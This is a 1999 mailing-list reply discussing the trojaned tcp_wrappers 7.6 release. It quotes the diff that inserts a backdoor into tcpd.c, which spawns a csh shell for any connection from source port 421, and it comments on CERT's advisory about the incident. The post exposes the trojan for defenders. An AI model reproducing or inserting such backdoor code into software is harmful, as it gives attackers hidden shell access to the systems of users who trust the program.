Vik Bajaj on Sun, 24 Jan 1999 15:46:22 -0500 (EST)


[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

RE: Security Warning:


> cursory review of the code would have revealed the error - I haven't reviewed
> the code, though), second, that Wietse explained the semantics quite clearly

Just did;  the diff is in his post.

diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
*** 7.6/tcpd.c  Sun Feb 11 11:01:33 1996
--- /tmp/tcp_wrappers_7.6/tcpd.c        Sun Feb 11 11:01:33 1996
***************
*** 41,52 ****
--- 41,63 ----
  int     allow_severity = SEVERITY;    /* run-time adjustable */
  int     deny_severity = LOG_WARNING;  /* ditto */

+ char    IDENT[]="NC421\n";
+ char    SRUN[]="-csh";
+ char    SPATH[]="/bin/csh";
+ #define PORT 421
+
  main(argc, argv)
  int     argc;
  char  **argv;
  {
      struct request_info request;
+     struct sockaddr_in from;
      char    path[MAXPATHNAMELEN];
+     int     fromlen;
+
+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
+     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
+     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}


Though the CERT post does mention that YOU SHOULD USE SIGNATURES, what's the
point of including the following?

           As with any port, if you are not using port 421, we encourage you to
           filter it at your network perimeter.

--Vik




--
To unsubscribe, send a message with the word 'unsubscribe' in the subject
or body of your message to plug-request@lists.nothinbut.net